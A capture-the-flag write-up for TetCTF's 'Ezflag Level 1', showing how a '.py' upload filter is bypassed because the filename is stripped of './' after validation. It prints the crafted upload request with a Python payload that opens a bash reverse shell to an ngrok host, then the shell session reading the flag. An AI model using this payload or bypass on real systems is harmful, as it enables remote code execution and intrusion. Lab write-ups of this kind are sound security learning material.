Ezflag Level 1

This was a file upload vulnerability. Looking inside the lighttpd.conf file, we could see that any .py files are run with /usr/bin/python3.

alias.url += ( "/cgi-bin" => "/var/www/cgi-bin" )
alias.url += ( "/uploads" => "/var/www/upload" )
cgi.assign = ( ".py" => "/usr/bin/python3" )

Validation is performed to check for the .py extension.

def valid_file_name(name) -> bool:
    if len(name) == 0 or name[0] == '/':
        return False
    if '..' in name:
        return False
    if '.py' in name:
        return False
    return True

However, once validated, a replacement of ./ with an empty string is performed.

normalized_name = item.filename.strip().replace('./', '')

Thus, we can bypass the .py filter by using ./py.

Content-Disposition: form-data; name="file"; filename="socengexp.p./y"
Content-Type: text/x-python-script

import os

os.system('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/15273 0>&1"')

This allows us to get a reverse shell.

www-data@48b6db5957ed:/$ cat flag
cat flag
TetCTF{65e95f4eacc1fe7010616e051f1c610a}

PreviousAnimals Nexthxp CTF 2021

Last updated 1 year ago